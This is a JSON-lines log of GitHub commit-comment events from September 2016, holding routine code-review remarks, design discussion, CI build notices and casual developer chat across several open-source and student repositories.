{"id":"4507536208","type":"CommitCommentEvent","actor":{"login":"sbojchuk"},"repo":{"name":"IF-066-Java/bugTrckr"},"payload":{"comment":{"id":18877594,"position":5,"line":46,"path":"src/main/java/com/softserverinc/edu/repositories/UserRepository.java","commit_id":"2553fb9a31883c8a391842e47c1f0e15aabf42c8","created_at":"2016-09-02T09:34:56Z","updated_at":"2016-09-02T09:34:56Z","body":"also isDeletedFalse better to pass boolean parameter for such field \"deleted\""}},"created_at":"2016-09-02T09:34:56Z"}
{"id":"4507540008","type":"CommitCommentEvent","actor":{"login":"JansonLiao"},"repo":{"name":"JansonLiao/HelloWorld"},"payload":{"comment":{"id":18877603,"position":1,"line":4,"path":"README.md","commit_id":"95861a5f970a3f73527523f4bc5cc6d72c51b529","created_at":"2016-09-02T09:35:48Z","updated_at":"2016-09-02T09:35:48Z","body":"#hd地方的"}},"created_at":"2016-09-02T09:35:48Z"}
{"id":"4507543532","type":"CommitCommentEvent","actor":{"login":"OwenArnold"},"repo":{"name":"DMSC-Instrument-Data/documents"},"payload":{"comment":{"id":18877613,"position":38,"line":127,"path":"design/plankton/CommunicationLayerDesign.md","commit_id":"448b8019a314f730b86cd7b285e1bdb66f04082d","created_at":"2016-09-02T09:36:35Z","updated_at":"2016-09-02T09:36:35Z","body":"That's a good question. And yes, my original design had all of the interface stuff in the `Adapter`, as you say `SpecifiedDevice` = `Adapter` + `Device`. I think I slightly prefer that approach. I guess that's the thick-adapter approach because the adapter has to manipulate inputs/outputs as well as perform the communication. The approach i've been talking about in this sections is a slight variant that keeps the `Adapter` thinner, but it adds more layers. Please think of other variants you'd like to propose."}},"created_at":"2016-09-02T09:36:35Z"}
{"id":"4507544388","type":"CommitCommentEvent","actor":{"login":"MichaelWedel"},"repo":{"name":"DMSC-Instrument-Data/documents"},"payload":{"comment":{"id":18877615,"position":19,"line":108,"path":"design/plankton/CommunicationLayerDesign.md","commit_id":"448b8019a314f730b86cd7b285e1bdb66f04082d","created_at":"2016-09-02T09:36:48Z","updated_at":"2016-09-02T09:36:48Z","body":"I agree on this, and the \"two-layer-approach\" + \"system test\" does that. The `Device`-class would be a model of the device, including the state machine and a set of properties and methods to interact with the Device in Python, in a sensible way that is understandable by people who do not fluently read the Linkam-language. This is important for when we \"inherit\" a device from some external source and have to maintain it and for example have to add another Adapter. For that case I wouldn't want to go through the effort of finding the manual, understanding the protocol and write a translator for that protocol. This should be done once by the person implementing the device, translating the protocol to understandable, standard Python concepts.\r\n\r\nIf the protocol specifies that there should be a response for everything, that's fine, it can be in the `Adapter`."}},"created_at":"2016-09-02T09:36:48Z"}
{"id":"4507545316","type":"CommitCommentEvent","actor":{"login":"sbojchuk"},"repo":{"name":"IF-066-Java/bugTrckr"},"payload":{"comment":{"id":18877617,"position":4,"line":26,"path":"src/main/java/com/softserverinc/edu/repositories/UserRepository.java","commit_id":"f66b4755cfe8d2b3277d4f0ad7d607fc198260f7","created_at":"2016-09-02T09:37:01Z","updated_at":"2016-09-02T09:37:01Z","body":"\"isDeleted\" better to pass as boolean parameter"}},"created_at":"2016-09-02T09:37:01Z"}
{"id":"4507545369","type":"CommitCommentEvent","actor":{"login":"DaniilZhavner"},"repo":{"name":"PurrWeb/upwork-user-agreement"},"payload":{"comment":{"id":18877618,"position":null,"line":null,"path":null,"commit_id":"bca756c0f6c41505170f1ffc146aa3aab85dc3ef","created_at":"2016-09-02T09:37:02Z","updated_at":"2016-09-02T09:37:02Z","body":"done"}},"created_at":"2016-09-02T09:37:02Z"}
{"id":"4507549176","type":"CommitCommentEvent","actor":{"login":"nadako"},"repo":{"name":"vshaxe/haxe-languageserver"},"payload":{"comment":{"id":18877625,"position":5,"line":20,"path":"src/haxeLanguageServer/features/CodeActionFeature.hx","commit_id":"f39f20df1e08260a49775c40d22a7e5ef0e98f69","created_at":"2016-09-02T09:37:52Z","updated_at":"2016-09-02T09:37:52Z","body":"This was like this intentionally, because in future, we'de like to add more code actions, not only from diagnostics, so we make an array and collect code actions from different places."}},"created_at":"2016-09-02T09:37:52Z"}
{"id":"4507552144","type":"CommitCommentEvent","actor":{"login":"julienmathis"},"repo":{"name":"centreon/centreon"},"payload":{"comment":{"id":18877629,"position":5,"line":180,"path":"www/include/configuration/configServers/listServers.php","commit_id":"92e370609729d535f9028333e41785306cf5614d","created_at":"2016-09-02T09:38:31Z","updated_at":"2016-09-02T09:38:31Z","body":"only one nagios.cfg can be activated in the same time. No need to get all files..."}},"created_at":"2016-09-02T09:38:31Z"}
{"id":"4507552889","type":"CommitCommentEvent","actor":{"login":"JansonLiao"},"repo":{"name":"JansonLiao/HelloWorld"},"payload":{"comment":{"id":18877635,"position":1,"line":4,"path":"README.md","commit_id":"95861a5f970a3f73527523f4bc5cc6d72c51b529","created_at":"2016-09-02T09:38:43Z","updated_at":"2016-09-02T09:38:43Z","body":"#1 文件有问题"}},"created_at":"2016-09-02T09:38:43Z"}
{"id":"4507557695","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18877643,"position":null,"line":null,"path":null,"commit_id":"b16e1c12cdbfa1187cc516dedfd550b57ad9cb69","created_at":"2016-09-02T09:39:49Z","updated_at":"2016-09-02T09:39:49Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 900](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12335&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-02T09:39:49Z"}
{"id":"4507561564","type":"CommitCommentEvent","actor":{"login":"xiao2ming"},"repo":{"name":"Linrstudio/WebFont"},"payload":{"comment":{"id":18877655,"position":null,"line":null,"path":null,"commit_id":"95edb36b6f25c6d133be5b4ab6f21799fb8e95ad","created_at":"2016-09-02T09:40:44Z","updated_at":"2016-09-02T09:40:44Z","body":"求更新2015.5"}},"created_at":"2016-09-02T09:40:44Z"}
{"id":"4507563441","type":"CommitCommentEvent","actor":{"login":"andrewlinfoot"},"repo":{"name":"keystonejs/keystone-storage-namefunctions"},"payload":{"comment":{"id":18877659,"position":null,"line":null,"path":null,"commit_id":"dc3ef5cc0ea632dac7b2f48a6104c21da8033566","created_at":"2016-09-02T09:41:10Z","updated_at":"2016-09-02T09:41:10Z","body":"I agree. I'm not a big fan of the _ prefix syntax in general because it's hard to keep clear distinctions between \"private\" and \"public\" methods."}},"created_at":"2016-09-02T09:41:10Z"}
{"id":"4507564708","type":"CommitCommentEvent","actor":{"login":"GeertvanHorrik"},"repo":{"name":"WildGums/Orc.Controls"},"payload":{"comment":{"id":18877660,"position":20,"line":272,"path":"src/Orc.Controls/Orc.Controls.Shared/Controls/DatePicker/Views/DatePickerControl.xaml.cs","commit_id":"bad19603d890d10b7a21fa4915798eea4037775b","created_at":"2016-09-02T09:41:28Z","updated_at":"2016-09-02T09:41:28Z","body":"Please rename to OnCopyButtonClick"}},"created_at":"2016-09-02T09:41:28Z"}
{"id":"4507566688","type":"CommitCommentEvent","actor":{"login":"mcasperson"},"repo":{"name":"AutoGeneral/IridiumApplicationTesting"},"payload":{"comment":{"id":18877666,"position":8,"line":122,"path":"build.gradle","commit_id":"bea9c61c3e2b7c0eda150aea96177f17f4bac340","created_at":"2016-09-02T09:41:56Z","updated_at":"2016-09-02T09:41:56Z","body":"There have been a few releases - see https://travis-ci.org/mcasperson/IridiumApplicationTesting and https://github.com/mcasperson/IridiumApplicationTesting/releases/latest."}},"created_at":"2016-09-02T09:41:56Z"}
{"id":"4507567320","type":"CommitCommentEvent","actor":{"login":"GeertvanHorrik"},"repo":{"name":"WildGums/Orc.Controls"},"payload":{"comment":{"id":18877667,"position":26,"line":278,"path":"src/Orc.Controls/Orc.Controls.Shared/Controls/DatePicker/Views/DatePickerControl.xaml.cs","commit_id":"bad19603d890d10b7a21fa4915798eea4037775b","created_at":"2016-09-02T09:42:05Z","updated_at":"2016-09-02T09:42:05Z","body":"I think we had a service to set stuff to clipboard, but can't remember for 100 %. Can you check if we have an IClipboardService?"}},"created_at":"2016-09-02T09:42:05Z"}
{"id":"4507567450","type":"CommitCommentEvent","actor":{"login":"rajatkhemka"},"repo":{"name":"drishticone/2.0.0"},"payload":{"comment":{"id":18877668,"position":null,"line":null,"path":null,"commit_id":"041f23445df1e8eebed60ff44369c0308b538e41","created_at":"2016-09-02T09:42:07Z","updated_at":"2016-09-02T09:42:07Z","body":"@anuradha27 find <br> and <br /> and replace with </br> and re-indent. do the following task with sublime find and replace tool"}},"created_at":"2016-09-02T09:42:07Z"}
{"id":"4507568201","type":"CommitCommentEvent","actor":{"login":"GeertvanHorrik"},"repo":{"name":"WildGums/Orc.Controls"},"payload":{"comment":{"id":18877670,"position":30,"line":282,"path":"src/Orc.Controls/Orc.Controls.Shared/Controls/DatePicker/Views/DatePickerControl.xaml.cs","commit_id":"bad19603d890d10b7a21fa4915798eea4037775b","created_at":"2016-09-02T09:42:18Z","updated_at":"2016-09-02T09:42:18Z","body":"Rename to OnPasteButtonClick"}},"created_at":"2016-09-02T09:42:18Z"}
{"id":"4507568626","type":"CommitCommentEvent","actor":{"login":"raintao"},"repo":{"name":"raintao/waterfall"},"payload":{"comment":{"id":18877671,"position":null,"line":null,"path":null,"commit_id":"1ae9556d38719cb1995bfa60eba3d39c18019fe1","created_at":"2016-09-02T09:42:23Z","updated_at":"2016-09-02T09:42:23Z","body":"原生js做的瀑布流"}},"created_at":"2016-09-02T09:42:23Z"}
{"id":"4507569036","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":18877673,"position":null,"line":null,"path":null,"commit_id":"fc9f73d860ecc8ac010ae52130ee4eb87215d73d","created_at":"2016-09-02T09:42:29Z","updated_at":"2016-09-02T09:42:29Z","body":"I meant I\"d like to see what happens with both conditions :-)"}},"created_at":"2016-09-02T09:42:29Z"}
{"id":"4507569310","type":"CommitCommentEvent","actor":{"login":"MichaelWedel"},"repo":{"name":"DMSC-Instrument-Data/documents"},"payload":{"comment":{"id":18877674,"position":38,"line":127,"path":"design/plankton/CommunicationLayerDesign.md","commit_id":"448b8019a314f730b86cd7b285e1bdb66f04082d","created_at":"2016-09-02T09:42:33Z","updated_at":"2016-09-02T09:42:33Z","body":"I think if you change the names slightly we're back to `Adapter + Binding + Device` :)"}},"created_at":"2016-09-02T09:42:33Z"}
{"id":"4507570278","type":"CommitCommentEvent","actor":{"login":"martins-olekss"},"repo":{"name":"taliso/Pretenziju-registrs"},"payload":{"comment":{"id":18877678,"position":null,"line":null,"path":null,"commit_id":"cbc76c1c075a7830c07ebdceb95a2e70f2d2392f","created_at":"2016-09-02T09:42:47Z","updated_at":"2016-09-02T09:42:47Z","body":"Skatos, baigi cīnies ar HTML\r\nTā tik turpināt :)"}},"created_at":"2016-09-02T09:42:47Z"}
{"id":"4507570702","type":"CommitCommentEvent","actor":{"login":"alexandrudima"},"repo":{"name":"Microsoft/vscode"},"payload":{"comment":{"id":18877680,"position":null,"line":null,"path":null,"commit_id":"152e0b04a7a2de37358da53287cbad346c0182b8","created_at":"2016-09-02T09:42:53Z","updated_at":"2016-09-02T09:42:53Z","body":"@octref Yes, I intentionally did not provide completion suggestions for `bolder`, `inherit` or `lighter` because they are relative to the parent dom node fontWeight.\r\n\r\nThat would mean we might not be able in the future to change any fontWeight on any of the editor's parent dom tree as it would create an experience where before a release, the font would have a certain fontWeight, then after an update the fontWeight might change. \r\n\r\nI prefer to guide folks to use absolute values that we can guarantee will be respected from one release to another.\r\n"}},"created_at":"2016-09-02T09:42:53Z"}
{"id":"4507571092","type":"CommitCommentEvent","actor":{"login":"GeertvanHorrik"},"repo":{"name":"WildGums/Orc.Controls"},"payload":{"comment":{"id":18877683,"position":20,"line":353,"path":"src/Orc.Controls/Orc.Controls.Shared/Controls/DateTimePicker/Views/DateTimePickerControl.xaml.cs","commit_id":"bad19603d890d10b7a21fa4915798eea4037775b","created_at":"2016-09-02T09:42:58Z","updated_at":"2016-09-02T09:42:58Z","body":"Rename"}},"created_at":"2016-09-02T09:42:58Z"}
{"id":"4507573654","type":"CommitCommentEvent","actor":{"login":"christianfrei"},"repo":{"name":"silvanheller/vitrivr-ui"},"payload":{"comment":{"id":18877692,"position":24,"line":54,"path":"indexArt.html","commit_id":"961d8a6b2c930f3d02119f056d32afa972ab45ae","created_at":"2016-09-02T09:43:34Z","updated_at":"2016-09-02T09:43:34Z","body":"fixed in 1313a0a2ad038e5f629a769bbf50586ac0dc7b33"}},"created_at":"2016-09-02T09:43:34Z"}
{"id":"4507586366","type":"CommitCommentEvent","actor":{"login":"heyleke"},"repo":{"name":"elebihan/buildroot-s6"},"payload":{"comment":{"id":18877726,"position":34,"line":34,"path":"buildroot/package/s6-linux-init-skeleton/s6-linux-init-skeleton.mk","commit_id":"3098f9bce10f272443e798f245df2555988dd1fc","created_at":"2016-09-02T09:46:33Z","updated_at":"2016-09-02T09:46:33Z","body":"I believe this is not correct, if you choose not to use s6-rc, there is no s6-rc-compile (and also not required) (as I encountered)"}},"created_at":"2016-09-02T09:46:33Z"}
{"id":"4507586732","type":"CommitCommentEvent","actor":{"login":"chrisdone"},"repo":{"name":"chrisdone/hindent"},"payload":{"comment":{"id":18877727,"position":9,"line":174,"path":"TESTS.md","commit_id":"d277fa77e675f77e98c590b4d7bd67abe860f12e","created_at":"2016-09-02T09:46:38Z","updated_at":"2016-09-02T09:46:38Z","body":"Good point regarding vertical alignment. \r\n\r\nLet's punt on this for now. I don't see a clear way forward for it at the moment."}},"created_at":"2016-09-02T09:46:38Z"}
{"id":"4507587340","type":"CommitCommentEvent","actor":{"login":"nijel"},"repo":{"name":"phpmyadmin/phpmyadmin"},"payload":{"comment":{"id":18877728,"position":null,"line":null,"path":null,"commit_id":"9a943d464d9f1b56ef4277a18c045941359b3b26","created_at":"2016-09-02T09:46:45Z","updated_at":"2016-09-02T09:46:45Z","body":"The %s1 and %s2 are probably invalid format strings.... Fixed in 84a4434"}},"created_at":"2016-09-02T09:46:45Z"}
{"id":"4507588916","type":"CommitCommentEvent","actor":{"login":"shoot56"},"repo":{"name":"hriplivuy/proverska-js-task4"},"payload":{"comment":{"id":18877733,"position":null,"line":null,"path":null,"commit_id":"b4e25db12474876986e99591ef56a1438835d1a5","created_at":"2016-09-02T09:47:08Z","updated_at":"2016-09-02T09:47:08Z","body":"зачем ты удалил комент??"}},"created_at":"2016-09-02T09:47:08Z"}
{"id":"4507590877","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18877739,"position":null,"line":null,"path":null,"commit_id":"b16e1c12cdbfa1187cc516dedfd550b57ad9cb69","created_at":"2016-09-02T09:47:32Z","updated_at":"2016-09-02T09:47:32Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 900](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12335&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 1, passed: 100, ignored: 3; compilation error: Scala compiler in Test (new) Build time: 00:07:42\n### Failed tests\n```\norg.genivi.sota.device_registry.test.DeviceResourceSpec: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-02T09:47:32Z"}
{"id":"4507592742","type":"CommitCommentEvent","actor":{"login":"taliso"},"repo":{"name":"taliso/Pretenziju-registrs"},"payload":{"comment":{"id":18877746,"position":null,"line":null,"path":null,"commit_id":"cbc76c1c075a7830c07ebdceb95a2e70f2d2392f","created_at":"2016-09-02T09:47:57Z","updated_at":"2016-09-02T09:47:57Z","body":"Smejies:(\nJau sāk izmantot. Krauj virsū papildus.\n\n\n\nSūtīts no Samsung Mobile\n\n\n\n-------- Sākotnējā ziņa --------\nNo: Martin <notifications@github.com>\nDatums:\nKam: taliso/Pretenziju-registrs <Pretenziju-registrs@noreply.github.com>\nKopija: Talivaldis Olekss <Talivaldis.Olekss@tenaxgrupa.lv>,Author <author@noreply.github.com>\nTēma: Re: [taliso/Pretenziju-registrs] Turpinajums. Ver.3 (cbc76c1)\n\n\n\nSkatos, baigi cīnies ar HTML\nTā tik turpināt :)\n\n-\nYou are receiving this because you authored the thread.\nReply to this email directly, view it on GitHub<https://github.com/taliso/Pretenziju-registrs/commit/cbc76c1c075a7830c07ebdceb95a2e70f2d2392f#commitcomment-18877678>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AUKq9rTgaWTItmgeVYDNOOt7VZRcjIYgks5ql--XgaJpZM4Jziby>.\n"}},"created_at":"2016-09-02T09:47:57Z"}
{"id":"4507593050","type":"CommitCommentEvent","actor":{"login":"rajatkhemka"},"repo":{"name":"drishticone/2.0.0"},"payload":{"comment":{"id":18877749,"position":null,"line":null,"path":null,"commit_id":"041f23445df1e8eebed60ff44369c0308b538e41","created_at":"2016-09-02T09:48:02Z","updated_at":"2016-09-02T09:48:02Z","body":"@anuradha27 instead of opening so many `<center>` tag, just use one `<center>` tag, at opening of `<div class=\"col-md-9\">` and close the center tag at last. use sublime find and replace to remove all center tag"}},"created_at":"2016-09-02T09:48:02Z"}
{"id":"4507608961","type":"CommitCommentEvent","actor":{"login":"martins-olekss"},"repo":{"name":"taliso/Pretenziju-registrs"},"payload":{"comment":{"id":18877792,"position":null,"line":null,"path":null,"commit_id":"cbc76c1c075a7830c07ebdceb95a2e70f2d2392f","created_at":"2016-09-02T09:51:37Z","updated_at":"2016-09-02T09:51:37Z","body":"Nē, nesmejos.\r\nSākumā baigi grūti ir saprast kā PHP un HTML iet kopā"}},"created_at":"2016-09-02T09:51:37Z"}
{"id":"4507610805","type":"CommitCommentEvent","actor":{"login":"vladimir-iliev"},"repo":{"name":"mcb30/odoo"},"payload":{"comment":{"id":18877796,"position":null,"line":null,"path":null,"commit_id":"3dbdbe6969685cc8043cf7a4bb6425841d7bb6b9","created_at":"2016-09-02T09:52:03Z","updated_at":"2016-09-02T09:52:03Z","body":"this won't work correctly if you add force_company in multi company setup"}},"created_at":"2016-09-02T09:52:03Z"}
{"id":"4507611227","type":"CommitCommentEvent","actor":{"login":"brtknr"},"repo":{"name":"sommer/veins"},"payload":{"comment":{"id":18877798,"position":null,"line":null,"path":null,"commit_id":"89c8a10443779b737b475da86e5f7227a1d9c42d","created_at":"2016-09-02T09:52:10Z","updated_at":"2016-09-02T09:52:10Z","body":"l get two debug windows before it shows me the simulation window, both at line 1602 of envirbase.cc when I run it. Is that expected behaviour?"}},"created_at":"2016-09-02T09:52:10Z"}
{"id":"4507614297","type":"CommitCommentEvent","actor":{"login":"nadako"},"repo":{"name":"vshaxe/vscode-extern"},"payload":{"comment":{"id":18877801,"position":null,"line":null,"path":null,"commit_id":"74f46cc72c6dce0e3bcbbae86d590fc6d49f622c","created_at":"2016-09-02T09:52:50Z","updated_at":"2016-09-02T09:52:50Z","body":"wtf, it's not triggering..."}},"created_at":"2016-09-02T09:52:50Z"}
{"id":"4507616883","type":"CommitCommentEvent","actor":{"login":"berkerpeksag"},"repo":{"name":"python/pythondotorg"},"payload":{"comment":{"id":18877805,"position":null,"line":null,"path":null,"commit_id":"4ec134c173e6ee6f6cb8ec36567799e4c619e5af","created_at":"2016-09-02T09:53:26Z","updated_at":"2016-09-02T09:53:26Z","body":"Hi Betsy, it would be better if this could uploaded via the admin interface. See the \"Edit this page\" button at https://www.python.org/psf/sponsorship/. Right now, this can't be served via nginx since it was uploaded to the root of the directory."}},"created_at":"2016-09-02T09:53:26Z"}
{"id":"4507618113","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"Armen63/AddressBook"},"payload":{"comment":{"id":18877806,"position":149,"line":149,"path":"src/Controller.java","commit_id":"0fab61194e55f1bd98c09ae834f3ba24f955fdf8","created_at":"2016-09-02T09:53:43Z","updated_at":"2016-09-02T09:53:43Z","body":"addTelNumber method doesn't need has user as a argument because of your user you's kept logedInUser as a static field. (urishUser) "}},"created_at":"2016-09-02T09:53:43Z"}
{"id":"4507623454","type":"CommitCommentEvent","actor":{"login":"spitters"},"repo":{"name":"ejgallego/HoTT"},"payload":{"comment":{"id":18877814,"position":null,"line":null,"path":null,"commit_id":"fdd707b71c0d59b8ccb37deb3bf70d1aac657b34","created_at":"2016-09-02T09:54:57Z","updated_at":"2016-09-02T09:54:57Z","body":"@ejgallego What is the status of this? https://github.com/ejgallego/coq/tree/coqlib-cleanup seems to be gone."}},"created_at":"2016-09-02T09:54:57Z"}
{"id":"4507626511","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"Armen63/AddressBook"},"payload":{"comment":{"id":18877822,"position":11,"line":11,"path":"src/User.java","commit_id":"0fab61194e55f1bd98c09ae834f3ba24f955fdf8","created_at":"2016-09-02T09:55:38Z","updated_at":"2016-09-02T09:55:38Z","body":"You don't need keep map for your friend list\r\n```\r\nstatic TreeMap<String,String> friendList = new TreeMap<>(); should be\r\nprivate Set<User> friends = new HashSet();\r\n```"}},"created_at":"2016-09-02T09:55:38Z"}
{"id":"4507630276","type":"CommitCommentEvent","actor":{"login":"HankTheDrunk"},"repo":{"name":"NeverSinkGaming/NeverSink-Filter"},"payload":{"comment":{"id":18877830,"position":null,"line":null,"path":null,"commit_id":"5adf49b53dc99025c4172e8455cd1cada04699d2","created_at":"2016-09-02T09:56:29Z","updated_at":"2016-09-02T09:56:29Z","body":"Will this be fully ready for the league today? Thank you for your hard work!"}},"created_at":"2016-09-02T09:56:29Z"}
{"id":"4507630598","type":"CommitCommentEvent","actor":{"login":"Plou"},"repo":{"name":"Plou/education"},"payload":{"comment":{"id":18877831,"position":21,"line":21,"path":"introduction-au-javascript/readme.md","commit_id":"cbab7bb66a7a70680512b444793da80606a50176","created_at":"2016-09-02T09:56:34Z","updated_at":"2016-09-02T09:56:34Z","body":"readme.md"}},"created_at":"2016-09-02T09:56:34Z"}
{"id":"4507631279","type":"CommitCommentEvent","actor":{"login":"taliso"},"repo":{"name":"taliso/Pretenziju-registrs"},"payload":{"comment":{"id":18877832,"position":null,"line":null,"path":null,"commit_id":"cbc76c1c075a7830c07ebdceb95a2e70f2d2392f","created_at":"2016-09-02T09:56:43Z","updated_at":"2016-09-02T09:56:43Z","body":"Pagaidām vispār pēc PHP nav vajadzības.\r\nBet saprotu, ka turpmāk stipri vajadzēs.\r\nMan uzspiež arī attēlot tālākos procesus. Ar plānu, ka arī klients varēs apskatīt.\r\n\r\nTT\r\n\r\n\r\nFrom: Martin [mailto:notifications@github.com]\r\nSent: piektdiena, 2016. gada 2. septembris 12:52\r\nTo: taliso/Pretenziju-registrs <Pretenziju-registrs@noreply.github.com>\r\nCc: Talivaldis Olekss <Talivaldis.Olekss@tenaxgrupa.lv>; Author <author@noreply.github.com>\r\nSubject: Re: [taliso/Pretenziju-registrs] Turpinajums. Ver.3 (cbc76c1)\r\n\r\n\r\nNē, nesmejos.\r\nSākumā baigi grūti ir saprast kā PHP un HTML iet kopā\r\n\r\n—\r\nYou are receiving this because you authored the thread.\r\nReply to this email directly, view it on GitHub<https://github.com/taliso/Pretenziju-registrs/commit/cbc76c1c075a7830c07ebdceb95a2e70f2d2392f#commitcomment-18877792>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AUKq9j-wqU7JmxTbaCWdQFsyXfbwHyMtks5ql_GpgaJpZM4Jziby>.\r\n"}},"created_at":"2016-09-02T09:56:43Z"}
{"id":"4507634039","type":"CommitCommentEvent","actor":{"login":"xuwancai"},"repo":{"name":"facebook/osquery"},"payload":{"comment":{"id":18877835,"position":12,"line":69,"path":"osquery/tables/system/linux/smbios_tables.cpp","commit_id":"e0f350e439912b5ebc1f6607d2553781421e8ebb","created_at":"2016-09-02T09:57:21Z","updated_at":"2016-09-02T09:57:21Z","body":"However, when i test osquery in some system, i find that the smbios in /sys/firmware/efi/systab is like smbios=0xc899d000. in this case, this function cannot get smbios data, but dmicode can; Also in function readFromAddress , the size maybe lower than 0xFFF0, so i think maybe \"for (offset = 0; offset <= 0xFFF0 && offset <=size ; offset += 16)\" is a good choose.\r\n\r\n"}},"created_at":"2016-09-02T09:57:21Z"}
{"id":"4507636381","type":"CommitCommentEvent","actor":{"login":"martins-olekss"},"repo":{"name":"taliso/Pretenziju-registrs"},"payload":{"comment":{"id":18877843,"position":null,"line":null,"path":null,"commit_id":"cbc76c1c075a7830c07ebdceb95a2e70f2d2392f","created_at":"2016-09-02T09:57:57Z","updated_at":"2016-09-02T09:57:57Z","body":"Bet bez PHP nekas nenonāk uz DB"}},"created_at":"2016-09-02T09:57:57Z"}
{"id":"4507638973","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18877849,"position":null,"line":null,"path":null,"commit_id":"d636ba88eaf126fe72d2cf4fd52b35a215a5951b","created_at":"2016-09-02T09:58:33Z","updated_at":"2016-09-02T09:58:33Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 901](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12344&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-02T09:58:33Z"}
{"id":"4507639760","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"Armen63/AddressBook"},"payload":{"comment":{"id":18877851,"position":6,"line":6,"path":"src/UserRepasitoryimpl.java","commit_id":"0fab61194e55f1bd98c09ae834f3ba24f955fdf8","created_at":"2016-09-02T09:58:45Z","updated_at":"2016-09-02T09:58:45Z","body":"Your repository should has system outs or inputs there should be on controller"}},"created_at":"2016-09-02T09:58:45Z"}
{"id":"4507641886","type":"CommitCommentEvent","actor":{"login":"danielmarbach"},"repo":{"name":"Particular/NServiceBus"},"payload":{"comment":{"id":18877853,"position":22,"line":102,"path":"src/NServiceBus.Core/DelayedDelivery/TimeoutManager/ExpiredTimeoutsPoller.cs","commit_id":"4d73e137ad9a147eb54d0cefa80479b81e1f1225","created_at":"2016-09-02T09:59:14Z","updated_at":"2016-09-02T09:59:14Z","body":"@ramonsmits brought up a good point in a discussion today. This might increase the likely hood of timeout duplicates. Are we OK with that or should we revise this PR? // @Particular/nservicebus-maintainers "}},"created_at":"2016-09-02T09:59:14Z"}
{"id":"4507643059","type":"CommitCommentEvent","actor":{"login":"taliso"},"repo":{"name":"taliso/Pretenziju-registrs"},"payload":{"comment":{"id":18877859,"position":null,"line":null,"path":null,"commit_id":"cbc76c1c075a7830c07ebdceb95a2e70f2d2392f","created_at":"2016-09-02T09:59:29Z","updated_at":"2016-09-02T09:59:29Z","body":"Jā, jau sapratu.\r\n\r\nFrom: Martin [mailto:notifications@github.com]\r\nSent: piektdiena, 2016. gada 2. septembris 12:58\r\nTo: taliso/Pretenziju-registrs <Pretenziju-registrs@noreply.github.com>\r\nCc: Talivaldis Olekss <Talivaldis.Olekss@tenaxgrupa.lv>; Author <author@noreply.github.com>\r\nSubject: Re: [taliso/Pretenziju-registrs] Turpinajums. Ver.3 (cbc76c1)\r\n\r\n\r\nBet bez PHP nekas nenonāk uz DB\r\n\r\n—\r\nYou are receiving this because you authored the thread.\r\nReply to this email directly, view it on GitHub<https://github.com/taliso/Pretenziju-registrs/commit/cbc76c1c075a7830c07ebdceb95a2e70f2d2392f#commitcomment-18877843>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AUKq9uK_G_q9Ab-D0aYWC2A5Yn3wTEYfks5ql_MlgaJpZM4Jziby>.\r\n"}},"created_at":"2016-09-02T09:59:29Z"}
{"id":"4507643216","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"Armen63/AddressBook"},"payload":{"comment":{"id":18877860,"position":8,"line":8,"path":"src/Variables.java","commit_id":"0fab61194e55f1bd98c09ae834f3ba24f955fdf8","created_at":"2016-09-02T09:59:31Z","updated_at":"2016-09-02T09:59:31Z","body":"You don't need keep users here. "}},"created_at":"2016-09-02T09:59:31Z"}
{"id":"4507643339","type":"CommitCommentEvent","actor":{"login":"vladimir-iliev"},"repo":{"name":"mcb30/odoo"},"payload":{"comment":{"id":18877861,"position":null,"line":null,"path":null,"commit_id":"273d6d9db365fc66fbfb294cc8cf2406ea9accba","created_at":"2016-09-02T09:59:33Z","updated_at":"2016-09-02T09:59:33Z","body":"this also won't work correctly with force_company, in multi company setup or if someone changes user's company, while there's is a cached value"}},"created_at":"2016-09-02T09:59:33Z"}
{"id":"4511246771","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18888062,"position":null,"line":null,"path":null,"commit_id":"ccaa23bd7e04d9bc051eecd8a66d8a4fbb5297a6","created_at":"2016-09-03T00:01:00Z","updated_at":"2016-09-03T00:01:00Z","body":"AddLoggingToInstaller (JasonGlazer) - i386-Windows-7-VisualStudio-12: OK (2332 of 2332 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ccaa23bd7e04d9bc051eecd8a66d8a4fbb5297a6-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ccaa23bd7e04d9bc051eecd8a66d8a4fbb5297a6-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-03T00:01:00Z"}
